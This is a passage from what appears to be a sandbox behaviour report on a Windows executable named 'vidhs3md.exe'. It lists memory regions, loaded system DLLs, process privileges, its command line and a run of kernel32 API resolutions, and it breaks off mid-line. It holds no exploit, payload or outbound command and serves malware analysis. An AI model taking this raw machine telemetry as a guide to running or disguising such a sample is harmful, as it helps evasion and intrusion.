end_va = 0xbc56796fff entry_point = 0x0 region_type = private name = "private_0x000000bc56790000" filename = "" Region: id = 10546 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10547 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10548 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10549 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10550 start_va = 0xbc567b0000 end_va = 0xbc56937fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc567b0000" filename = "" Region: id = 10551 start_va = 0xbc56940000 end_va = 0xbc56ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc56940000" filename = "" Region: id = 10552 start_va = 0xbc56ad0000 end_va = 0xbc57ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc56ad0000" filename = "" Region: id = 10553 start_va = 0xbc57ed0000 end_va = 0xbc57ed0fff entry_point = 0x0 region_type = private name = "private_0x000000bc57ed0000" filename = "" Region: id = 10554 start_va = 0xbc57ee0000 end_va = 0xbc57ee0fff entry_point = 0x0 region_type = private name = "private_0x000000bc57ee0000" filename = "" Region: id = 10555 start_va = 0xbc57ef0000 end_va = 0xbc57fcffff entry_point = 0x0 region_type = private name = "private_0x000000bc57ef0000" filename = "" Region: id = 10556 start_va = 0xbc57ef0000 end_va = 0xbc57f2ffff entry_point = 0x0 region_type = private name = "private_0x000000bc57ef0000" filename = "" Region: id = 10557 start_va = 0xbc57fc0000 end_va = 0xbc57fcffff entry_point = 0x0 region_type = private name = "private_0x000000bc57fc0000" filename = "" Region: id = 10558 start_va = 0x7ff7fd409000 end_va = 0x7ff7fd40afff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd409000" filename = "" Region: id = 10559 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 10560 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 10561 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10562 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 10563 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 10564 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 10565 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 10566 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 10569 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 10570 start_va = 0xbc57fd0000 end_va = 0xbc580cffff entry_point = 0x0 region_type = private name = "private_0x000000bc57fd0000" filename = "" Region: id = 10572 start_va = 0xbc580d0000 end_va = 0xbc58406fff entry_point = 0xbc580d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10573 start_va = 0xbc56540000 end_va = 0xbc56560fff entry_point = 0xbc56540000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 10574 start_va = 0xbc57f30000 end_va = 0xbc57f88fff entry_point = 0xbc57f30000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10575 start_va = 0xbc58410000 end_va = 0xbc5862cfff entry_point = 0x0 region_type = private name = "private_0x000000bc58410000" filename = "" Region: id = 10576 start_va = 0xbc58630000 end_va = 0xbc5884dfff entry_point = 0x0 region_type = private name = "private_0x000000bc58630000" filename = "" Region: id = 10577 start_va = 0xbc58850000 end_va = 0xbc58960fff entry_point = 0x0 region_type = private name = "private_0x000000bc58850000" filename = "" Region: id = 10578 start_va = 0xbc58970000 end_va = 0xbc58b86fff entry_point = 0x0 region_type = private name = "private_0x000000bc58970000" filename = "" Region: id = 10579 start_va = 0xbc58b90000 end_va = 0xbc58c9dfff entry_point = 0x0 region_type = private name = "private_0x000000bc58b90000" filename = "" Region: id = 10608 start_va = 0xbc56540000 end_va = 0xbc5657ffff entry_point = 0x0 region_type = private name = "private_0x000000bc56540000" filename = "" Region: id = 10609 start_va = 0xbc57f30000 end_va = 0xbc57f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc57f30000" filename = "" Region: id = 10610 start_va = 0x7ff7fd40e000 end_va = 0x7ff7fd40ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd40e000" filename = "" Region: id = 10611 start_va = 0xbc57fd0000 end_va = 0xbc58087fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc57fd0000" filename = "" Region: id = 10612 start_va = 0xbc580c0000 end_va = 0xbc580cffff entry_point = 0x0 region_type = private name = "private_0x000000bc580c0000" filename = "" Region: id = 10613 start_va = 0xbc57f30000 end_va = 0xbc57f33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc57f30000" filename = "" Region: id = 10614 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 10615 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 10616 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 10617 start_va = 0xbc57f40000 end_va = 0xbc57f46fff entry_point = 0x0 region_type = private name = "private_0x000000bc57f40000" filename = "" Region: id = 10618 start_va = 0xbc57f50000 end_va = 0xbc57f54fff entry_point = 0xbc57f50000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 10619 start_va = 0xbc57f60000 end_va = 0xbc57f60fff entry_point = 0xbc57f60000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 10620 start_va = 0xbc57f70000 end_va = 0xbc57f71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc57f70000" filename = "" Region: id = 10621 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 10622 start_va = 0xbc57f80000 end_va = 0xbc57f80fff entry_point = 0xbc57f80000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 10623 start_va = 0xbc57f90000 end_va = 0xbc57f91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc57f90000" filename = "" Region: id = 10624 start_va = 0xbc57f80000 end_va = 0xbc57f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc57f80000" filename = "" Thread: id = 1017 os_tid = 0xd08 Thread: id = 1018 os_tid = 0xd0c Thread: id = 1019 os_tid = 0xab4 Thread: id = 1021 os_tid = 0x6ec Process: id = "155" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x6adee000" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0x974" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10580 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10581 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10582 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10583 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10584 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10585 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10586 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 10587 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10588 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10589 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 10590 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10591 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10592 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10593 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10594 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10595 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10596 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10597 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10598 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 10599 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10600 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10601 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10602 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10603 start_va = 0x480000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10604 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10605 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10606 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10607 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 10700 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10701 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10702 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10703 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10704 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10705 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10706 start_va = 0x5a0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 10707 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10708 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10709 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10710 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10711 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10712 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10713 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 10714 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10715 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 10716 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10717 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10718 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10719 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10720 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 10721 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10722 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 10723 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10736 start_va = 0x74550000 end_va = 0x745e1fff entry_point = 0x74550000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 10737 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10738 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10739 start_va = 0x2d0000 end_va = 0x2f9fff entry_point = 0x2d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10740 start_va = 0x6a0000 end_va = 0x827fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 10741 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10742 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10743 start_va = 0x830000 end_va = 0x9b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 10744 start_va = 0x9c0000 end_va = 0x1dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 10745 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 10746 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10747 start_va = 0x1dc0000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Thread: id = 1020 os_tid = 0xce8 [0300.436] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0300.436] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0300.437] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0300.438] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0300.446] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0300.447] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0300.447] GetProcAddress 